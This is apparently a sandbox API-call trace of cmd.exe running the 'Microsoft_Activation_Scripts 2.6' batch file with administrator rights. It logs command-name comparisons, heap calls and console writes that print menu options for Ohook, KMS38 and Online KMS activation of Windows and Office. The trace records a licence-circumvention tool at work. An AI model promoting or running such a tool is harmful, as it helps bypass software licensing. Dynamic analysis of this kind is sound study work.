_wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.872] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.872] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.872] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.872] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.872] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.872] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.872] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.873] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.873] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.873] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.873] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.873] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.873] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.873] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.873] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.873] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.873] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.873] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.873] GetLastError () returned 0x7b [0180.873] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.876] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.876] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.876] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.876] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.876] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.877] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.877] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.877] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.877] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.877] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.877] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.877] GetProcessHeap () returned 0x19a8f1e0000 [0180.877] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x9a) returned 0x19a8f1fff80 [0180.877] GetProcessHeap () returned 0x19a8f1e0000 [0180.877] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x114) returned 0x19a8f1ea8b0 [0180.877] GetProcessHeap () returned 0x19a8f1e0000 [0180.878] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea8b0, Size=0x54) returned 0x19a8f1ea8b0 [0180.883] GetProcessHeap () returned 0x19a8f1e0000 [0180.883] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea8b0) returned 0x54 [0180.883] GetProcessHeap () returned 0x19a8f1e0000 [0180.883] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x9c) returned 0x19a8f200be0 [0180.883] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer=" [2] Ohook | Office | Permanent\r\n") returned 65 [0180.883] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.883] GetFileType (hFile=0x24) returned 0x2 [0180.883] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.884] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.884] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.884] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x41) returned 1 [0180.887] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.887] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.889] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.889] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.889] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.889] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.890] SetConsoleInputExeNameW () returned 0x1 [0180.890] GetConsoleOutputCP () returned 0x1b5 [0180.890] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.890] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.891] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.891] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.891] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.891] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9511, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2527 [0180.891] GetProcessHeap () returned 0x19a8f1e0000 [0180.892] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200be0) returned 1 [0180.892] GetProcessHeap () returned 0x19a8f1e0000 [0180.892] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea8b0) returned 1 [0180.892] GetProcessHeap () returned 0x19a8f1e0000 [0180.893] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fff80) returned 1 [0180.893] GetProcessHeap () returned 0x19a8f1e0000 [0180.893] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f202420) returned 1 [0180.893] GetProcessHeap () returned 0x19a8f1e0000 [0180.893] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0180.893] GetProcessHeap () returned 0x19a8f1e0000 [0180.894] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0180.894] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.894] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2527 [0180.894] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.894] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9583, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x256f [0180.894] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [3] KMS38 ^| Windows ^| Year 2038\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo: [3] KMS38 ^| Windows ^| Year 2038\r\n__\r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 72 [0180.894] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.894] GetFileType (hFile=0xa0) returned 0x1 [0180.894] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.894] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x256f [0180.895] GetProcessHeap () returned 0x19a8f1e0000 [0180.895] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.895] GetProcessHeap () returned 0x19a8f1e0000 [0180.895] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.896] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.896] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.896] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.896] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.896] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.896] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.896] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.896] GetProcessHeap () returned 0x19a8f1e0000 [0180.896] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0180.896] GetProcessHeap () returned 0x19a8f1e0000 [0180.896] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0180.896] GetProcessHeap () returned 0x19a8f1e0000 [0180.896] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x90) returned 0x19a8f202380 [0180.896] _tell (_FileHandle=3) returned 9583 [0180.897] _close (_FileHandle=3) returned 0 [0180.897] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.897] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.897] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.897] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.897] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.897] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.897] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.897] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.897] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.897] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.897] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.897] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.897] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.897] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.897] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.897] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.897] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.897] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.897] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.898] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.898] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.898] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.898] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.898] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.898] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.898] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.898] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.898] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.898] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.898] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.898] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.898] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.898] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.898] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.898] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.898] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.898] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.898] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.898] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.898] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.898] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.898] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.898] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.899] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.899] GetLastError () returned 0x7b [0180.899] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.899] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.899] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.900] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.900] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.900] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.900] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.900] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.900] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.900] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.900] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.900] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.900] GetProcessHeap () returned 0x19a8f1e0000 [0180.900] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x9a) returned 0x19a8f2005b0 [0180.900] GetProcessHeap () returned 0x19a8f1e0000 [0180.900] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x114) returned 0x19a8f1ea8b0 [0180.900] GetProcessHeap () returned 0x19a8f1e0000 [0180.900] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea8b0, Size=0x56) returned 0x19a8f1ea8b0 [0180.900] GetProcessHeap () returned 0x19a8f1e0000 [0180.900] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea8b0) returned 0x56 [0180.900] GetProcessHeap () returned 0x19a8f1e0000 [0180.900] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x9c) returned 0x19a8f200190 [0180.900] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer=" [3] KMS38 | Windows | Year 2038\r\n") returned 65 [0180.900] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.900] GetFileType (hFile=0x24) returned 0x2 [0180.900] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.901] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.901] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.901] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x41) returned 1 [0180.904] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.904] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.905] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.905] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.905] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.905] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.905] SetConsoleInputExeNameW () returned 0x1 [0180.905] GetConsoleOutputCP () returned 0x1b5 [0180.906] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.906] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.906] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.906] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.907] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.907] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9583, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x256f [0180.907] GetProcessHeap () returned 0x19a8f1e0000 [0180.907] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200190) returned 1 [0180.907] GetProcessHeap () returned 0x19a8f1e0000 [0180.908] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea8b0) returned 1 [0180.908] GetProcessHeap () returned 0x19a8f1e0000 [0180.908] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2005b0) returned 1 [0180.908] GetProcessHeap () returned 0x19a8f1e0000 [0180.908] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f202380) returned 1 [0180.908] GetProcessHeap () returned 0x19a8f1e0000 [0180.908] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0180.908] GetProcessHeap () returned 0x19a8f1e0000 [0180.908] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0180.909] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.909] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x256f [0180.909] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0180.912] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9655, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25b7 [0180.912] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [4] Online KMS ^| Windows / Office ^| 180 Days\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo: [4] Online KMS ^| Windows / Office ^| 180 Days\r\n__\r\n==============================================================\r\n_=%%a\"\r\n_desktop_=%%b\"\r\n") returned 72 [0180.912] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.912] GetFileType (hFile=0xa0) returned 0x1 [0180.912] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.912] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25b7 [0180.912] GetProcessHeap () returned 0x19a8f1e0000 [0180.912] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0180.913] GetProcessHeap () returned 0x19a8f1e0000 [0180.913] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0180.913] _wcsicmp (_String1="echo:", _String2=")") returned 60 [0180.913] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0180.913] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0180.913] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0180.913] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0180.914] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0180.914] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0180.914] GetProcessHeap () returned 0x19a8f1e0000 [0180.914] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0180.914] GetProcessHeap () returned 0x19a8f1e0000 [0180.914] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0180.914] GetProcessHeap () returned 0x19a8f1e0000 [0180.914] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x90) returned 0x19a8f202060 [0180.914] _tell (_FileHandle=3) returned 9655 [0180.914] _close (_FileHandle=3) returned 0 [0180.914] _wcsicmp (_String1="echo:", _String2="DIR") returned 1 [0180.914] _wcsicmp (_String1="echo:", _String2="ERASE") returned -15 [0180.914] _wcsicmp (_String1="echo:", _String2="DEL") returned 1 [0180.914] _wcsicmp (_String1="echo:", _String2="TYPE") returned -15 [0180.914] _wcsicmp (_String1="echo:", _String2="COPY") returned 2 [0180.914] _wcsicmp (_String1="echo:", _String2="CD") returned 2 [0180.914] _wcsicmp (_String1="echo:", _String2="CHDIR") returned 2 [0180.914] _wcsicmp (_String1="echo:", _String2="RENAME") returned -13 [0180.914] _wcsicmp (_String1="echo:", _String2="REN") returned -13 [0180.914] _wcsicmp (_String1="echo:", _String2="ECHO") returned 58 [0180.915] _wcsicmp (_String1="echo:", _String2="SET") returned -14 [0180.915] _wcsicmp (_String1="echo:", _String2="PAUSE") returned -11 [0180.915] _wcsicmp (_String1="echo:", _String2="DATE") returned 1 [0180.915] _wcsicmp (_String1="echo:", _String2="TIME") returned -15 [0180.915] _wcsicmp (_String1="echo:", _String2="PROMPT") returned -11 [0180.915] _wcsicmp (_String1="echo:", _String2="MD") returned -8 [0180.915] _wcsicmp (_String1="echo:", _String2="MKDIR") returned -8 [0180.915] _wcsicmp (_String1="echo:", _String2="RD") returned -13 [0180.915] _wcsicmp (_String1="echo:", _String2="RMDIR") returned -13 [0180.915] _wcsicmp (_String1="echo:", _String2="PATH") returned -11 [0180.915] _wcsicmp (_String1="echo:", _String2="GOTO") returned -2 [0180.915] _wcsicmp (_String1="echo:", _String2="SHIFT") returned -14 [0180.915] _wcsicmp (_String1="echo:", _String2="CLS") returned 2 [0180.915] _wcsicmp (_String1="echo:", _String2="CALL") returned 2 [0180.915] _wcsicmp (_String1="echo:", _String2="VERIFY") returned -17 [0180.915] _wcsicmp (_String1="echo:", _String2="VER") returned -17 [0180.915] _wcsicmp (_String1="echo:", _String2="VOL") returned -17 [0180.915] _wcsicmp (_String1="echo:", _String2="EXIT") returned -21 [0180.915] _wcsicmp (_String1="echo:", _String2="SETLOCAL") returned -14 [0180.915] _wcsicmp (_String1="echo:", _String2="ENDLOCAL") returned -11 [0180.915] _wcsicmp (_String1="echo:", _String2="TITLE") returned -15 [0180.915] _wcsicmp (_String1="echo:", _String2="START") returned -14 [0180.915] _wcsicmp (_String1="echo:", _String2="DPATH") returned 1 [0180.915] _wcsicmp (_String1="echo:", _String2="KEYS") returned -6 [0180.915] _wcsicmp (_String1="echo:", _String2="MOVE") returned -8 [0180.915] _wcsicmp (_String1="echo:", _String2="PUSHD") returned -11 [0180.916] _wcsicmp (_String1="echo:", _String2="POPD") returned -11 [0180.916] _wcsicmp (_String1="echo:", _String2="ASSOC") returned 4 [0180.916] _wcsicmp (_String1="echo:", _String2="FTYPE") returned -1 [0180.916] _wcsicmp (_String1="echo:", _String2="BREAK") returned 3 [0180.916] _wcsicmp (_String1="echo:", _String2="COLOR") returned 2 [0180.916] _wcsicmp (_String1="echo:", _String2="MKLINK") returned -8 [0180.916] _wcsnicmp (_String1="echo", _String2="cmd ", _MaxCount=0x4) returned 2 [0180.916] GetFileAttributesW (lpFileName="\n" (normalized: "c:\\windows\\system32\\\n")) returned 0xffffffff [0180.916] GetLastError () returned 0x7b [0180.916] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0180.917] GetFileAttributesW (lpFileName="echo:" (normalized: "c:\\windows\\system32\\echo:")) returned 0xffffffff [0180.917] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0180.917] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0180.917] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0180.917] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0180.917] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0180.917] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0180.917] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0180.917] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0180.917] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0180.917] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0180.917] GetProcessHeap () returned 0x19a8f1e0000 [0180.917] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x9a) returned 0x19a8f200030 [0180.917] GetProcessHeap () returned 0x19a8f1e0000 [0180.917] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x114) returned 0x19a8f1ea8b0 [0180.917] GetProcessHeap () returned 0x19a8f1e0000 [0180.917] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea8b0, Size=0x70) returned 0x19a8f1ea8b0 [0180.917] GetProcessHeap () returned 0x19a8f1e0000 [0180.917] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea8b0) returned 0x70 [0180.917] GetProcessHeap () returned 0x19a8f1e0000 [0180.917] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x9c) returned 0x19a8f200c90 [0180.917] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x43f9efe9e8 | out: _Buffer=" [4] Online KMS | Windows / Office | 180 Days\r\n") returned 65 [0180.918] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.918] GetFileType (hFile=0x24) returned 0x2 [0180.918] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0180.918] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe968 | out: lpMode=0x43f9efe968) returned 1 [0180.918] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.918] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7ff7bd731b60*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x43f9efe9a8, lpReserved=0x0 | out: lpBuffer=0x7ff7bd731b60*, lpNumberOfCharsWritten=0x43f9efe9a8*=0x41) returned 1 [0180.921] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.922] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0180.922] _get_osfhandle (_FileHandle=1) returned 0x24 [0180.922] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0180.922] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.922] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.923] SetConsoleInputExeNameW () returned 0x1 [0180.923] GetConsoleOutputCP () returned 0x1b5 [0180.923] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.923] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.924] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0180.924] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0180.924] _get_osfhandle (_FileHandle=3) returned 0xa0 [0180.924] SetFilePointer (in: hFile=0xa0, lDistanceToMove=9655, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25b7 [0180.924] GetProcessHeap () returned 0x19a8f1e0000 [0180.924] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200c90) returned 1 